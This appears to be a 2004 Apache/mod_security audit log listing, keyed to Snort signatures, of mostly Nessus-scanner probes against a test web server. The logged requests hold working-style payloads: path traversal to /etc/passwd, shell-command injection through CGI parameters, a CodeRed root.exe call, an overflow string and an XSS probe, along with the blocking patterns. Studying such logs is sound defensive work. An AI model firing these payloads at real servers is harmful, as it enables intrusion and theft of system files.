1250 | BID2936 | web-application-attack | WEB-MISC Cisco IOS HTTP configuration attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:31:27 2004] "GET /level/16/exec/show/config/cr HTTP/1.1" 200 578 Handler: (null) Error: mod_security: pausing [/level/16/exec/show/config/cr] for 50000 ms ---------------------------------------- GET /level/16/exec/show/config/cr HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/exec/" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1256 | CA-2001-19 | web-application-attack | WEB-IIS CodeRed v2 root.exe access | Request: 68.48.142.117 - - [Tue Mar 9 22:19:35 2004] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 566 Handler: (null) Error: mod_security: pausing [/scripts/root.exe] for 50000 ms ---------------------------------------- GET /scripts/root.exe?/c+dir HTTP/1.0 Connnection: close Host: www mod_security-message: Access denied with code 200. Pattern match "/root\.exe" at THE_REQUEST. mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1 |
1286 | | web-application-activity | WEB-IIS _mem_bin access | Request: 217.160.165.173 - - [Fri Mar 12 22:30:45 2004] "GET /_mem_bin/ HTTP/1.1" 403 293 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/_mem_bin ---------------------------------------- GET /_mem_bin/ HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=57 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1288 | | web-application-activity | WEB-FRONTPAGE /_vti_bin/ access | Request: 217.160.165.173 - - [Fri Mar 12 22:30:50 2004] "GET /_vti_bin/ HTTP/1.1" 403 293 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/_vti_bin ---------------------------------------- GET /_vti_bin/ HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=46 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1300 | BID3361 | attempted-admin | WEB-PHP admin.php file upload attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:42:09 2004] "GET /cgi-bin/admin.php?upload=1&file=config.php&file_name=nessus.txt&wdir=/images/&userfile=config.php&userfile_name=nessus.txt HTTP/1.1" 403 301 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/admin.php ---------------------------------------- GET /cgi-bin/admin.php?upload=1&file=config.php&file_name=nessus.txt&wdir=/images/&userfile=config.php&userfile_name=nessus.txt HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1301 | BID9270 BID3361 BID7532 | attempted-recon | WEB-PHP admin.php access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:42 2004] "GET /admin.php HTTP/1.1" 403 293 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/admin.php ---------------------------------------- GET /admin.php HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1308 | | attempted-recon | WEB-CGI sendmessage.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:40 2004] "GET /cgi-bin/sendmessage.cgi HTTP/1.1" 403 307 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/sendmessage.cgi ---------------------------------------- GET /cgi-bin/sendmessage.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=47 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1309 | CAN-1999-0509 CA-1996-11 | attempted-recon | WEB-CGI zsh access | Request: 217.160.165.173 - - [Fri Mar 12 22:38:39 2004] "GET /cgi-bin/zsh HTTP/1.1" 403 295 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/zsh ---------------------------------------- GET /cgi-bin/zsh HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=94 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1385 | BID3727 BID3726 Nessus 10849 | web-application-activity | WEB-MISC mod-plsql administration access | Request: 217.160.165.173 - - [Fri Mar 12 22:31:00 2004] "GET /admin_/ HTTP/1.1" 403 291 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/admin_ ---------------------------------------- GET /admin_/ HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=25 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1392 | BID3754 BID3755 | attempted-recon | WEB-CGI lastlines.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:39 2004] "GET /cgi-bin/lastlines.cgi HTTP/1.1" 403 305 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/lastlines.cgi ---------------------------------------- GET /cgi-bin/lastlines.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=53 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1395 | BID3759 CAN-2001-1209 | web-application-activity | WEB-CGI zml.cgi attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:39:14 2004] "GET /cgi-bin/zml.cgi?file=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 403 299 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/zml.cgi ---------------------------------------- GET /cgi-bin/zml.cgi?file=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1400 | | web-application-attack | WEB-IIS /scripts/samples/ access | Request: 24.127.175.68 - - [Sat Mar 13 15:13:20 2004] "GET http://pussyman.com/members//scripts/samples/search/webhits.exe;dunno;RainM; HTTP/1.0" 200 566 Handler: proxy-server Error: mod_security: pausing [http://pussyman.com/members//scripts/samples/search/webhits.exe;dunno;RainM;] for 50000 ms ---------------------------------------- GET http://pussyman.com/members//scripts/samples/search/webhits.exe;dunno;RainM; HTTP/1.0 Cache-Control: no-cache Connection: close Host: pussyman.com Pragma: no-cache Proxy-Connection: keep-alive Referer: http://pussyman.com/members//scripts/samples/search/webhits.exe;dunno;RainM; User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) mod_security-message: Access denied with code 200. Pattern match "/scripts/samples/" at THE_REQUEST. mod_security-action: 200 HTTP/1.0 200 OK Connection: close Content-Type: text/html; charset=iso-8859-1 |
1454 | CAN-2001-0223 Nessus 10597 | attempted-recon | WEB-CGI wwwwais access | Request: 217.160.165.173 - - [Fri Mar 12 22:47:41 2004] "GET /cgi-bin/wwwwais HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: pausing [/cgi-bin/wwwwais] for 50000 ms ---------------------------------------- GET /cgi-bin/wwwwais HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/wwwwais" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1455 | CVE-2000-0432 | attempted-recon | WEB-CGI calender.pl access | Request: 217.160.165.173 - - [Fri Mar 12 22:39:01 2004] "GET /cgi-bin/calendar/calender.pl?config=|cat%20/etc/passwd| HTTP/1.1" 403 312 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/calendar ---------------------------------------- GET /cgi-bin/calendar/calender.pl?config=|cat%20/etc/passwd| HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=98 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1468 | BID1776 CVE-2000-0922 | web-application-attack | WEB-CGI Web Shopper shopper.cgi attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:38:01 2004] "GET /shopper.cgi?newpage=../../../../../../etc/passwd HTTP/1.1" 403 295 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/shopper.cgi ---------------------------------------- GET /shopper.cgi?newpage=../../../../../../etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1470 | CAN-2001-0997 | attempted-recon | WEB-CGI listrec.pl access | Request: 217.160.165.173 - - [Fri Mar 12 22:41:20 2004] "GET /cgi-bin/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc| HTTP/1.1" 403 302 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/listrec.pl ---------------------------------------- GET /cgi-bin/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc| HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1471 | CAN-2001-0271 | attempted-recon | WEB-CGI mailnews.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:39:35 2004] "GET /cgi-bin/mailnews.cgi HTTP/1.1" 403 304 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/mailnews.cgi ---------------------------------------- GET /cgi-bin/mailnews.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1473 | CAN-2001-0232 | attempted-recon | WEB-CGI newsdesk.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:37:21 2004] "GET /cgi-bin/newsdesk.cgi?t=../../../../../../etc/passwd HTTP/1.1" 403 304 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/newsdesk.cgi ---------------------------------------- GET /cgi-bin/newsdesk.cgi?t=../../../../../../etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1476 | CAN-2001-1130 | attempted-recon | WEB-CGI sdbsearch.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:40:05 2004] "GET /cgi-bin-sdb/sdbsearch.cgi HTTP/1.1" 200 578 Handler: (null) Error: mod_security: pausing [/cgi-bin-sdb/sdbsearch.cgi] for 50000 ms ---------------------------------------- GET /cgi-bin-sdb/sdbsearch.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/sdbsearch\.cgi" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1478 | attempted-recon | WEB-CGI swc access | Request: 217.160.165.173 - - [Fri Mar 12 22:37:24 2004] "GET /cgi-bin/swc?ctr=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.1" 403 295 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/swc ---------------------------------------- GET /cgi-bin/swc?ctr=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 | |
1479 | Nessus 10696 BID2890 CVE-2001-0805 | web-application-attack | WEB-CGI ttawebtop.cgi arbitrary file attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:42:35 2004] "GET /ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../etc/passwd HTTP/1.1" 403 298 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/ttawebtop.cgi ---------------------------------------- GET /ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1480 | BID2890 Nessus 10696 CVE-2001-0805 | attempted-recon | WEB-CGI ttawebtop.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:45:43 2004] "GET /cgi-bin/ttawebtop.cgi HTTP/1.1" 403 305 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/ttawebtop.cgi ---------------------------------------- GET /cgi-bin/ttawebtop.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=21 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1481 | Nessus 10290 | attempted-recon | WEB-CGI upload.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:41:54 2004] "GET /cgi-bin/upload.cgi HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: pausing [/cgi-bin/upload.cgi] for 50000 ms ---------------------------------------- GET /cgi-bin/upload.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/upload\.cgi" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1482 | Nessus 10294 | attempted-recon | WEB-CGI view_source access | Request: 217.160.165.173 - - [Fri Mar 12 22:37:16 2004] "GET /view_source?../../../../../../../../../etc/passwd HTTP/1.1" 403 295 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/view_source ---------------------------------------- GET /view_source?../../../../../../../../../etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1486 | | web-application-activity | WEB-IIS ctss.idc access | Request: 217.160.165.173 - - [Fri Mar 12 22:40:58 2004] "GET /scripts/tools/ctss.idc HTTP/1.1" 200 578 Handler: (null) Error: mod_security: Warning. Pattern match "/ctss\.idc" at THE_REQUEST. ---------------------------------------- GET /scripts/tools/ctss.idc HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Access denied with code 200. Pattern match "/*\.idc" at THE_REQUEST. mod_security-action: 200 HTTP/1.1 200 OK Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1487 | | web-application-activity | WEB-IIS /iisadmpwd/aexp2.htr access | Request: 217.160.165.173 - - [Fri Mar 12 22:41:48 2004] "GET /iisadmpwd/aexp2.htr HTTP/1.1" 403 303 Handler: (null) Error: client denied by server configuration: /usr/local/apache/htdocs/iisadmpwd ---------------------------------------- GET /iisadmpwd/aexp2.htr HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1488 | CAN-2001-0305 BID2385 Nessus 10639 | web-application-attack | WEB-CGI store.cgi directory traversal attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:37:31 2004] "GET /cgi-bin/store.cgi?StartID=../../../../../../../../../etc/passwd%00.html HTTP/1.1" 200 578 Handler: cgi-script Error: mod_security: Invalid character detected [0] ---------------------------------------- GET /cgi-bin/store.cgi?StartID=../../../../../../../../../etc/passwd%00.html HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Invalid character detected mod_security-action: 200 HTTP/1.1 200 OK Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1493 | | web-application-activity | WEB-MISC RBS ISP /newuser access | Request: 217.160.165.173 - - [Fri Mar 12 22:37:11 2004] "GET /newuser HTTP/1.1" 404 287 Handler: (null) Error: mod_security: Warning. Pattern match "/newuser" at THE_REQUEST. ---------------------------------------- GET /newuser HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: 192.168.1.103 Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/newuser" at THE_REQUEST. HTTP/1.1 404 Not Found Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1495 | BID3175 CAN-2001-1115 | web-application-activity | WEB-CGI SIX webboard generate.cgi access | Request: 217.160.165.173 - - [Fri Mar 12 22:39:04 2004] "GET /cgi-bin/webboard/generate.cgi HTTP/1.1" 404 309 Handler: cgi-script Error: mod_security: Warning. Pattern match "/generate\.cgi" at THE_REQUEST. ---------------------------------------- GET /cgi-bin/webboard/generate.cgi HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/generate\.cgi" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1497 | | web-application-attack | WEB-MISC cross site scripting attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:30:26 2004] "GET http://xxxxxxxxxxx./<SCRIPT>alert('Vulnerable')</SCRIPT>.shtml HTTP/1.1" 403 357 Handler: proxy-server Error: client denied by server configuration: proxy:http://xxxxxxxxxxx./<SCRIPT>alert('Vulnerable')</SCRIPT>.shtml ---------------------------------------- GET http://xxxxxxxxxxx./<SCRIPT>alert('Vulnerable')</SCRIPT>.shtml HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Close Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1499 | Nessus 10778 | web-application-activity | WEB-MISC SiteScope Service access | Request: 217.160.165.173 - - [Fri Mar 12 22:46:03 2004] "GET /SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator HTTP/1.1" 404 310 Handler: (null) Error: mod_security: Warning. Pattern match "/SiteScope/cgi/go\.exe/SiteScope" at THE_REQUEST. ---------------------------------------- GET /SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/SiteScope/cgi/go\.exe/SiteScope" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1501 | CAN-2001-0561 Nessus 10669 | web-application-attack | WEB-CGI a1stats a1disp3.cgi directory traversal attempt | Request: 217.160.165.173 - - [Fri Mar 12 22:38:50 2004] "GET /cgi-bin/a1disp3.cgi?/../../../../../../etc/passwd HTTP/1.1" 403 303 Handler: cgi-script Error: client denied by server configuration: /usr/local/apache/cgi-bin/a1disp3.cgi ---------------------------------------- GET /cgi-bin/a1disp3.cgi?/../../../../../../etc/passwd HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) HTTP/1.1 403 Forbidden Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
1508 | CAN-1999-0885 | web-application-activity | WEB-CGI alibaba.pl access | Request: 217.160.165.173 - - [Fri Mar 12 22:41:25 2004] "GET /cgi-bin/alibaba.pl HTTP/1.1" 404 298 Handler: cgi-script Error: mod_security: Warning. Pattern match "/alibaba\.pl" at THE_REQUEST. ---------------------------------------- GET /cgi-bin/alibaba.pl HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* Accept-Charset: iso-8859-1,*,utf-8 Accept-Language: en Connection: Keep-Alive Host: www.testproxy.net Pragma: no-cache User-Agent: Mozilla/4.75 [en] (X11, U; Nessus) mod_security-message: Warning. Pattern match "/alibaba\.pl" at THE_REQUEST. HTTP/1.1 404 Not Found Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=iso-8859-1 |
